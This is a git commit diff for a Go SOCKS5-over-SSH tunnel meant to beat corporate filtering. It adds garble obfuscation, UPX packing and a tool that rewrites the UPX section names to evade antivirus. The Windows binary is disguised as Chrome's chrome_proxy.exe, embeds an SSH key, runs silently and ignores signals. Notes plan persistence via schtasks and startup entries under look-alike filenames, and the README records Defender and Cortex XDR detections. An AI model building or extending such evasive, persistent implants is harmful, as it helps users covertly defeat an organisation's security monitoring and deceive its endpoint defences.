Initial work on systemOSDetect for WINE

.github/workflows/build.yml

@@ -0,0 +1,122 @@
+name: Build go-socks5-ssh-proxy 
+
+on:
+  pull_request:
+  push:
+  schedule:
+    # Run daily build at 08:30 UTC
+    - cron: '00 08 30 * *'
+  workflow_dispatch:
+
+env:
+  # The go version to use for builds. We set check-latest to true when
+  # installing, so we get the latest patch version that matches the
+  # expression.
+  GO_VERSION: "~1.22.5"
+
+jobs:
+  release:
+    name: Build release
+    environment: prod
+    runs-on: ubuntu-latest
+    steps:
+      - name: Check out repository code
+        uses: actions/checkout@v4
+
+      - uses: actions/setup-go@v5
+        with:
+          go-version: ${{ env.GO_VERSION }}
+          cache: true
+          check-latest: true
+
+      - name: Use config_release.go from action secrets
+        uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
+        with:
+          base64-encoded-secret: ${{ secrets.CONFIG_RELEASE_GO_FILE }}
+          filename: "config_release.go"
+
+      - name: Use resources/ssh_private_key from action secrets
+        uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
+        with:
+          base64-encoded-secret: ${{ secrets.RESOURCES_SSH_PRIVATE_KEY }}
+          filename: "ssh_private_key"
+          working-directory: "./resources"
+
+      - run: make release
+
+      - name: Store release artifacts
+        uses: actions/upload-artifact@v4
+        with:
+          name: dist-release
+          path: |
+            dist
+
+  goreleaser:
+    name: Build releases with goreleaser
+    environment: prod
+    runs-on: ubuntu-latest
+    steps:
+      - name: Check out repository code
+        uses: actions/checkout@v4
+
+      - uses: actions/setup-go@v5
+        with:
+          go-version: ${{ env.GO_VERSION }}
+          cache: true
+          check-latest: true
+
+      - name: Set up MinGW
+        uses: egor-tensin/setup-mingw@v2
+        with:
+          platform: x64
+
+      - name: Use config_release.go from action secrets
+        uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
+        with:
+          base64-encoded-secret: ${{ secrets.CONFIG_RELEASE_GO_FILE }}
+          filename: "config_release.go"
+
+      - name: Use resources/ssh_private_key from action secrets
+        uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
+        with:
+          base64-encoded-secret: ${{ secrets.RESOURCES_SSH_PRIVATE_KEY }}
+          filename: "ssh_private_key"
+          working-directory: "./resources"
+
+      - name: Install upx
+        run: sudo apt install upx
+
+      - name: Install garble
+        run: make install-deps
+
+      - name: Run GoReleaser to build releases
+        uses: goreleaser/goreleaser-action@v6
+        with:
+          # either 'goreleaser' (default) or 'goreleaser-pro'
+          distribution: goreleaser
+          # 'latest', 'nightly', or a semver
+          version: '~> v2'
+          args: release --clean --snapshot
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+
+      - name: Obfuscate UPX packed executable
+        run: "go run cmd/upx-obfuscator/main.go dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe"
+
+      - name: Copy win64 release exe for dist
+        run: "cp dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe dist/chrome_proxy.exe"
+
+      - name: Store win64 release exe for dist
+        uses: actions/upload-artifact@v4
+        with:
+          name: ChromeProxyPlugin
+          path: |
+            dist/chrome_proxy.exe
+
+      - name: Store all GoReleaser artifacts
+        uses: actions/upload-artifact@v4
+        with:
+          name: dist-goreleaser
+          path: |
+            dist

.github/workflows/obfuscate.yaml.snippet

@@ -0,0 +1,58 @@
+  release-obfuscate:
+    name: Build release obfuscated
+    runs-on: windows-latest
+    needs:
+      - release
+      - release-dll 
+    steps:
+      - name: Check out Alcatraz
+        uses: actions/checkout@v4
+        with:
+          repository: 'weak1337/Alcatraz'
+
+      - name: Download release artifacts
+        uses: actions/download-artifact@v4
+        with:
+          name: dist-release
+
+      - name: Download release-dll artifacts
+        uses: actions/download-artifact@v4
+        with:
+          name: dist-release-dll
+
+      - name: Dir
+        run: "Get-ChildItem -Path . -Force -Recurse"
+
+      - name: Run Alcatraz-con.exe on release EXE
+        run: "./x64/Release/Alcatraz-con.exe socks5-ssh-proxy.exe"
+      
+      - name: Run Alcatraz-con.exe on release DLL
+        run: "./x64/Release/Alcatraz-con.exe dll_windows_amd64_v1/go-socks5-ssh-proxy.dll"
+
+      - name: Create dist directory and move obfuscated artifacts
+        run: |
+          # Define source files and destination directory
+          $sourceFiles = @("socks5-ssh-proxy.exe", "dll_windows_amd64_v1/go-socks5-ssh-proxy.dll")
+          $destinationDir = "dist"
+
+          # Create the destination directory if it doesn't exist
+          if (-not (Test-Path -Path $destinationDir)) {
+              New-Item -ItemType Directory -Path $destinationDir
+          }
+
+          # Move each file to the destination directory
+          foreach ($file in $sourceFiles) {
+              if (Test-Path -Path $file) {
+                  Move-Item -Path $file -Destination $destinationDir
+                  Write-Output "Moved $file to $destinationDir"
+              } else {
+                  Write-Output "File $file does not exist"
+              }
+          }
+
+      - name: Store release artifacts
+        uses: actions/upload-artifact@v4
+        with:
+          name: dist-release-obfuscated
+          path: |
+            dist

.gitignore

@@ -1,7 +1,11 @@
 .DS_Store
 socks5-ssh-proxy
 resources/ssh_*
-config_release.go
+config_release*.go
+config_template_*.go
 socks5-ssh-proxy.release
+*.base64
 *.exe
 *.zip
+
+dist/

.goreleaser.yaml

@@ -0,0 +1,100 @@
+# This is an example .goreleaser.yml file with some sensible defaults.
+# Make sure to check the documentation at https://goreleaser.com
+
+# The lines below are called `modelines`. See `:help modeline`
+# Feel free to remove those if you don't want/need to use them.
+# yaml-language-server: $schema=https://goreleaser.com/static/schema.json
+# vim: set ts=2 sw=2 tw=0 fo=cnqoj
+
+version: 2
+
+before:
+  hooks:
+    # You may remove this if you don't use go modules.
+    - go mod tidy
+    # you may remove this if you don't need go generate
+    # - go generate ./...
+
+builds:
+  - id: "win-amd64-dll-release"
+    env:
+      - CGO_ENABLED=1
+      - CC=x86_64-w64-mingw32-gcc
+      - CXX=x86_64-w64-mingw32-g++
+    goos:
+      - windows
+    goarch:
+      - amd64
+    ldflags:
+      - -s -trimpath
+    gobinary: "scripts/garble.sh"
+    buildmode: c-shared
+    tags:
+      - release
+      - dll
+
+  - id: "win-release"
+    env:
+      - CGO_ENABLED=0
+    goos:
+      - windows
+    goarch:
+      - amd64
+    ldflags:
+      - -H=windowsgui
+    gobinary: "scripts/garble.sh"
+    tags:
+      - release
+
+upx:
+  - # Whether to enable it or not.
+    #
+    # Templates: allowed.
+    enabled: true
+
+    # Filter by build ID.
+    #ids: [build1, build2]
+
+    # Filter by GOOS.
+    goos: [windows]
+
+    # Filter by GOARCH.
+    goarch: [amd64]
+
+    # Filter by GOARM.
+    # goarm: [8]
+
+    # Filter by GOAMD64.
+    # goamd64: [v1]
+
+    # Compress argument.
+    # Valid options are from '1' (faster) to '9' (better), and 'best'.
+    compress: best
+
+    # Whether to try LZMA (slower).
+    lzma: true
+
+    # Whether to try all methods and filters (slow).
+    brute: true
+
+archives:
+  - format: tar.gz
+    # this name template makes the OS and Arch compatible with the results of `uname`.
+    name_template: >-
+      {{ .ProjectName }}_
+      {{- title .Os }}_
+      {{- if eq .Arch "amd64" }}x86_64
+      {{- else if eq .Arch "386" }}i386
+      {{- else }}{{ .Arch }}{{ end }}
+      {{- if .Arm }}v{{ .Arm }}{{ end }}
+    # use zip for windows archives
+    format_overrides:
+      - goos: windows
+        format: zip
+
+changelog:
+  sort: asc
+  filters:
+    exclude:
+      - "^docs:"
+      - "^test:"

Makefile

@@ -1,18 +1,31 @@
-SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go 
+SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go system.go
 GARBLE_BIN = $(shell go env GOPATH)/bin/garble
+GARBLE_CMD = $(GARBLE_BIN) -literals -tiny
+RELEASE_VERBOSE_MODE_KEY ?= ""
+
+all: socks5-ssh-proxy
+
+ci: release
+release: socks5-ssh-proxy.release socks5-ssh-proxy.exe
+	mkdir -v -p dist
+	cp -v $^ dist
 
-all: socks5-ssh-proxy socks5-ssh-proxy.release socks5-ssh-proxy.exe
 test: socks5-ssh-proxy
 	cp socks5-ssh-proxy ~/.ssh; cd ~/.ssh; ~/.ssh/socks5-ssh-proxy
 test-release: socks5-ssh-proxy.release
 	./socks5-ssh-proxy.release
 socks5-ssh-proxy: $(SOURCES) 
 	go build -o $@
-socks5-ssh-proxy.release: resources $(SOURCES)
+socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
-	go build -tags release -o $@
+	GOOS=darwin GOARCH=amd64 $(GARBLE_CMD) build -tags release -o $@
+	upx $@
 win: socks5-ssh-proxy.exe
 socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
-	GOOS=windows GOARCH=amd64 $(GARBLE_BIN) build -ldflags -H=windowsgui -tags release -o $@
+	GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui -X cfg.VerboseModeKey=$(RELEASE_VERBOSE_MODE_KEY)" -tags release -o $@
+	upx $@
+	go run cmd/upx-obfuscator/main.go $@
+goreleaser: resources $(GARBLE_BIN)
+	goreleaser build --clean --snapshot --id win-release
 win-package: ChromeProxyHelperPlugin.zip
 ChromeProxyHelperPlugin.zip: socks5-ssh-proxy.exe
 	cp socks5-ssh-proxy.exe chrome_proxy.exe
@@ -34,6 +47,8 @@ clean-key:
 config_release.go:
 	cp config_template.go $@
 	sed -i '' 's/!release/release/g' $@
+config_release.go.base64: config_release.go
+	base64 -i $< -o $@
 
 resources: resources/ssh_private_key
 resources/ssh_private_key:
@@ -42,5 +57,12 @@ resources/ssh_private_key:
 	@echo "====================================="
 	@cat $@.pub
 	@echo "====================================="
+resources/ssh_private_key.base64: resources/ssh_private_key
+	base64 -i $< -o $@
+
+fmt:
+	gofmt -w *.go
+
+secrets: config_release.go.base64 resources/ssh_private_key.base64
 
 .phony: clean test win

README.md

@@ -1,13 +1,42 @@
 # socks5-ssh-proxy
 
-If HTTP(s) is filtered and outbound SSH is allowed, just create a SOCKS5 proxy. Beat the sensorship, and be free!
+If HTTP(s) is filtered and outbound SSH is allowed, just create a SOCKS5 proxy over SSH using a [Jump server](https://en.wikipedia.org/wiki/Jump_server). Beat the (corporate) sensorship, and be free!
+
+## Background information
+
+The proxy can use [SSHFP DNS record](https://en.wikipedia.org/wiki/SSHFP_record) verification for extra protection so the SSH host public key is side-channel checked.
+
+The `release` build target is fully silent as `os.stdout` and `os.stderr` is written to `/dev/null`. Also it embeds the configuration to the SSH jump host (see `config_template.go` copied to `config_release.go`).
 
 ## Server installation
 
-For SSHFP check:
+When using OpenSSH server a special `tunnel` user should be created. It must configured no PTY could be created (interactive mode). So the client is unable to execute commands on the SSH jump host.
 
-- Create SSHFP DNS records use `ssh-keygen -r` on the server
+### `/etc/ssh/sshd_config`
-- Configure DNS server with those records
+
+The following OpenSSH daemon options could be set. This by default doesn't allow anyone to login except from users from the system group `ssh`. It immediate drops the connection instead of sending a response. The system `tunnel` user needs to set `PermitTTY no` so no shell is possible, only TCP forwarding.
+
+```
+PermitRootLogin no
+PasswordAuthentication no
+MaxAuthTries 0
+ChallengeResponseAuthentication no
+
+Match Group ssh
+	MaxAuthTries 3 # Only key-based may be tried
+
+Match User tunnel
+	MaxAuthTries 1 # Only key-based may be tried
+	GatewayPorts yes
+	AllowTcpForwarding yes
+	PermitTTY no
+	PasswordAuthentication no
+```
+
+### SSHFP verification
+
+- Create SSHFP DNS records use `ssh-keygen -r` on the SSH jumphost server
+- Configure (public) DNS server with those records
 - Check if records are active with `dig SSHFP <hostname> +short`
 
 ## Browsing with chrome over the proxy
@@ -18,9 +47,34 @@ E.g:
 
 ## Detection
 
-* Microsoft Defender: Trojan:Win32/Gracing.I - Severe
+It is highly likely this proxy will be detected by virus or malware scanners. This can be a false-positive see <https://go.dev/doc/faq#virus>.
 
-## Related blog posts
+Following detections have been tested:
 
-* https://blog.projectdiscovery.io/proxify-portable-cli-based-proxy/
+* Microsoft Defender: [Trojan](https://en.wikipedia.org/wiki/Trojan_horse_(computing)):Win32/Gracing.I - Severe. Probably fixed because of packing with UPX
-* https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/
+* Palo Alto Networks, Inc. - Cortex [XDR](https://en.wikipedia.org/wiki/Extended_detection_and_response): detected as Suspicious (no fix yet)
+
+## Build time dependencies
+
+## macOS
+
+* go
+* upx
+* goreleaser
+* mingw-w64 (for building the windows dll/exe)
+
+## Related information
+
+* <https://github.com/rootkit-io/awesome-malware-development>
+* <https://github.com/rshipp/awesome-malware-analysis#readme>
+* <https://github.com/Karneades/awesome-malware-persistence#readme>>
+* <https://www.yourcts.com/2024/01/19/beware-of-new-go-based-malware/>
+* <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
+* <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
+* <https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/>
+
+## Development information
+
+* <https://pypi.org/project/unipacker/>
+* <https://medium.com/analytics-vidhya/running-go-code-from-python-a65b3ae34a2d>
+* <https://github.com/burrowers/garble?tab=readme-ov-file#mechanism>>

cmd/upx-obfuscator/main.go

@@ -0,0 +1,41 @@
+package main
+
+import (
+	"os"
+	"bytes"
+	"log"
+)
+
+func bytesReplace(data, old, new []byte) []byte {
+	foundIndex := bytes.Index(data, old)
+	if foundIndex > -1 {
+		// Found it!
+		log.Println("Found identifier at offset", foundIndex)
+	} else {
+		return data
+		log.Fatalln("Error file is not UPX packed")
+	}
+
+	return bytes.Replace(data, old, new, 1)
+}
+
+func main() {
+	if len(os.Args) != 2 {
+		log.Fatalln("Specify exe file to obfuscate")
+	}
+
+	filename := os.Args[1]
+
+	log.Println("Obfuscating UPX compressed executable file")
+	log.Println("\t", filename)	
+
+	data, _ := os.ReadFile(filename)
+
+	data = bytesReplace(data, []byte("UPX0"), []byte("GSP7"))
+	data = bytesReplace(data, []byte("UPX1"), []byte("GSP1"))
+	data = bytesReplace(data, []byte("UPX2"), []byte("GSP2"))
+
+	_ = os.WriteFile(filename, data, 0666)
+
+	log.Println("done")
+}

config.go

@@ -3,6 +3,15 @@ package main
 import "io"
 
 type config struct {
+	// Verbose mode key
+	//
+	// In release builds the verbose mode is silenced when this key is given
+	//  verbose mode is force enabled. The key is read from the "VMK" environment
+	//  variable at startup.
+	//
+	// NOTE: This could be the sha256sum hex encoded string of the SSHPrivateKeyFile
+	VerboseModeKey string
+
 	// SSH server user name
 	SSHServerUserName string
 

config_template.go

@@ -1,10 +1,12 @@
 //go:build !release
 // +build !release
+
 package main
 
 import "strings"
 
 var cfg config = config{
+	VerboseModeKey:      "ShowMeTheMoney",
 	SSHServerUserName:   "username",
 	SSHPrivateKeyFile:   "path/to/id_ecdsa",
 	SSHServerURL:        "myhost.org:22",

docs/NOTES.md

@@ -0,0 +1,54 @@
+# Some notes to Escape from Babylon
+
+## Well known paths (Windows)
+
+* Python official install path for current user `%APPDATA\Local\Programs\Python\PythonXX`
+* NPM global current user path: `%APPDATA%\Roaming\npm\node_modules\npm\bin`
+* Go bin folder: `C:\Users\YourUsername\go\bin\go.exe`
+* Rust: `C:\Users\YourUsername\.cargo\bin\rustc.exe`
+* Haskel: `C:\Users\YourUsername\AppData\Roaming\local\bin\ghc.exe`
+* FireFox: `C:\Users\<username>\AppData\Local\Mozilla Firefox\firefox.exe`
+* Chrome: `C:\Users\<username>\AppData\Local\Google\Chrome\Application`
+	* `chrome.exe`: The main executable for launching Google Chrome.
+	* `chrome_proxy.exe`: A process used for managing proxy settings in Chrome.
+	* `chrome_launcher.exe`: Typically used to start the Chrome browser with specific configurations.
+	* `chrome.dll`: While not an .exe, chrome.dll is a crucial dynamic link library file used by Chrome. (For context, it is located in the same directory or subdirectories, but it’s not an executable file.)
+	* `chrome_remote_desktop_host.exe`: If Chrome Remote Desktop is installed, this executable handles remote desktop connections.
+	* `chrome_update.exe`: An executable for updating Chrome.
+
+* Edge extensions: `C:\Users\<YourUsername>\AppData\Local\Microsoft\Edge\User Data\Default\Extensions`
+* Opera: `C:\Users\<YourUsername>\AppData\Roaming\Opera Software\Opera Stable\Extensions`
+* Firefox profile extensions: `C:\Users\<YourUsername>\AppData\Roaming\Mozilla\Firefox\Profiles\<ProfileName>\extensions`
+* Chrome extensions and components: `C:\Users\<YourUsername>\AppData\Local\Google\Chrome\User Data\Default\Extensions`
+
+Check if running under wine by testing if executables are present:
+
+* `.wine/drive_c/windows/syswow64/wine*.exe`
+* `.wine/drive_c/windows/system32/wine*.exe`
+
+## Ultimate Packer for Executables (UPX)
+
+* <https://www.ired.team/offensive-security/defense-evasion/t1045-software-packing-upx>
+* <https://medium.com/@ankyrockstar26/unpacking-a-upx-malware-dca2cdd1a8de>
+* <https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html?ref=nishtahir.com>
+* <https://www.esecurityplanet.com/threats/upx-compression-detection-evasion/>
+
+## Persistence and hiding
+
+* Search for existing well known binary paths
+* Copy argv[0] to well known binary path
+* Register startup by system
+  * schtasks (cmd) for system or local user
+  * go-autostart: shortcut in start-menu
+* Write state file of persistence to somewhere...
+
+## Debugging release build
+
+* The "VMK" environment variable is the VerboseModeKey which enables logging to stdout/stderr even in release build
+
+## Windows
+
+* Copy to well known current user binary path to semi related filenames
+* Run via start menu item for current user, or via `schtasks`
+  * <https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create>
+  * <https://github.com/emersion/go-autostart>

docs/release-management.md

@@ -0,0 +1,8 @@
+# release management with github actions
+
+* Generate `resources/ssh_private_key` with `make resources/ssh_private_key`
+* Base64 encode `resources/ssh_private_key` with base64
+
+## See also
+
+* <https://github.com/marketplace/actions/secret-to-file>

main.go

@@ -133,6 +133,14 @@ func main() {
 
 	log.Println("SOCKS5 Addr", proxyServerURL)
 
+	systemOSDetect()
+	systemGetWellKnownExistingPaths()
+
+	mainLoop()
+}
+
+func mainLoop() {
 	for {
+		// TODO handle CTRL+C in debug and release + VMK modes
 	}
 }

main.py

@@ -0,0 +1,5 @@
+import ctypes
+
+lib = ctypes.cdll.LoadLibrary('library.dll')
+main = library.executeMain
+main()

main_debug.go

@@ -1,5 +1,6 @@
 //go:build !release
 // +build !release
+
 package main
 
 var resourceSSHPrivateKey string

main_dll.go

@@ -0,0 +1,13 @@
+//go:build dll
+// +build dll
+
+package main
+
+import (
+	"C"
+)
+
+//export executeMain
+func executeMain() {
+	main()
+}

main_release.go

@@ -1,29 +1,20 @@
 //go:build release
 // +build release
+
 package main
 
 import (
 	_ "embed"
 	"os"
-	"fmt"
-	"log"
 )
 
 //go:embed resources/ssh_private_key
 var resourceSSHPrivateKey string
 
 func init() {
-	// Open /dev/null for writing
+	dontSilenceKey := os.Getenv("VMK")
-	nullFile, err := os.OpenFile(os.DevNull, os.O_WRONLY, 0666)
+	if dontSilenceKey != cfg.VerboseModeKey {
-	if err != nil {
+		systemRouteAllLogging(os.DevNull)
-		fmt.Println("Error opening /dev/null:", err)
+		systemIgnoreAllSignals()
-		return
 	}
-
-	// Redirect stdout and stderr to /dev/null
-	os.Stdout = nullFile
-	os.Stderr = nullFile
-
-	// Redirect log facility to /dev/null
-	log.SetOutput(nullFile)
 }

scripts/garble.sh

@@ -0,0 +1,2 @@
+#!/usr/bin/env bash
+`go env GOPATH`/bin/garble -literals -tiny $@

system.go

@@ -0,0 +1,166 @@
+package main
+
+import (
+	"fmt"
+	"log"
+	"os"
+	"os/signal"
+	"path/filepath"
+	"strings"
+)
+
+// Route all logging
+func systemRouteAllLogging(logfile string) {
+	nullFile, err := os.OpenFile(logfile, os.O_WRONLY, 0666)
+	if err != nil {
+		fmt.Println("Error opening /dev/null:", err)
+		return
+	}
+
+	// Redirect stdout and stderr to /dev/null
+	os.Stdout = nullFile
+	os.Stderr = nullFile
+
+	// Redirect log facility to /dev/null
+	log.SetOutput(nullFile)
+}
+
+func systemGetAppDataPath() string {
+	return filepath.Join(os.Getenv("USERPROFILE"), "AppData")
+}
+
+// systemCheckDirExists checks if the directory at the given path exists.
+func systemIsDirExisting(path string) bool {
+	// Get file info
+	info, err := os.Stat(path)
+	if err != nil {
+		// If the error is due to the file not existing, return false
+		if os.IsNotExist(err) {
+			return false
+		}
+		// For any other errors, you may want to handle them as needed
+		return false
+	}
+
+	// Check if the info corresponds to a directory
+	return info.IsDir()
+}
+
+func systemGetFilesInDirectory(path string) ([]string, bool) {
+	var filesInDirectory []string
+
+	files, err := os.ReadDir(path)
+	if err != nil {
+		return nil, false
+	}
+
+	for _, file := range files {
+		filesInDirectory = append(filesInDirectory, file.Name())
+	}
+
+	return filesInDirectory, true
+}
+
+func systemIsFileExisting(path string) bool {
+	// Get file info
+	info, err := os.Stat(path)
+	if err != nil {
+		// If the error is due to the file not existing, return false
+		if os.IsNotExist(err) {
+			return false
+		}
+		// For any other errors, you may want to handle them as needed
+		return false
+	}
+
+	// Check if the info corresponds to a regular file
+	return !info.IsDir()
+}
+
+func systemGetSysWOW64Files() []string {
+	sysWOW64Path := filepath.Join("C:", "Windows", "SysWOW64")
+	files, _ := systemGetFilesInDirectory(sysWOW64Path)
+	return files
+}
+
+func systemGetSystem32Files() []string {
+	system32Path := filepath.Join("C:", "Windows", "system32")
+	files, _ := systemGetFilesInDirectory(system32Path)
+	return files
+}
+
+func systemGetWellKnownWINEOSFiles() []string {
+	var wineFiles []string
+	var foundFiles []string
+
+	foundFiles = append(foundFiles, systemGetSysWOW64Files()...)
+	foundFiles = append(foundFiles, systemGetSystem32Files()...)
+
+	for _, file := range foundFiles {
+		if strings.Contains(file, "wine") && strings.Contains(file, ".exe") {
+			wineFiles = append(wineFiles, file)
+		}
+	}
+
+	return wineFiles
+}
+
+func systemGetWellKnownExistingPaths() []string {
+	var existingPaths []string
+
+	appDataPath := systemGetAppDataPath()
+	if ok := systemIsDirExisting(appDataPath); !ok {
+		log.Println("\t❌", appDataPath)
+	}
+
+	wellKnownPathsToCheck := []string{
+		filepath.Join(appDataPath, "Local", "Programs", "Python"),           // TODO search python installations
+		filepath.Join(appDataPath, "Roaming", "npm", "node_modules", "bin"), // TODO search python installations
+	}
+
+	homeDirectory, err := os.UserHomeDir()
+	if err == nil {
+		homeDirPathsToCheck := []string{
+			filepath.Join(homeDirectory, "go", "bin"),
+		}
+		wellKnownPathsToCheck = append(wellKnownPathsToCheck, homeDirPathsToCheck...)
+	}
+
+	for _, path := range wellKnownPathsToCheck {
+		if ok := systemIsDirExisting(path); ok {
+			existingPaths = append(existingPaths, path)
+			log.Println("\t✅", path)
+		} else {
+			log.Println("\t❌", path)
+		}
+	}
+
+	return existingPaths
+}
+
+func systemIgnoreAllSignals() {
+	// Create a channel to receive OS signals.
+	sigs := make(chan os.Signal, 1)
+
+	// Notify the signal channel for all signals (you can add more if needed)
+	signal.Notify(sigs)
+
+	// This goroutine receives signals but does nothing with them.
+	go func() {
+		for sig := range sigs {
+			// Signal received but ignored
+			_ = sig
+			log.Println("Received OS signal", sig)
+		}
+	}()
+}
+
+func systemOSDetect() {
+	wineOSFiles := systemGetWellKnownWINEOSFiles()
+	if len(wineOSFiles) != 0 {
+		log.Println("WINE detected")
+		for _, file := range wineOSFiles {
+			log.Println("\t", file)
+		}
+	}
+}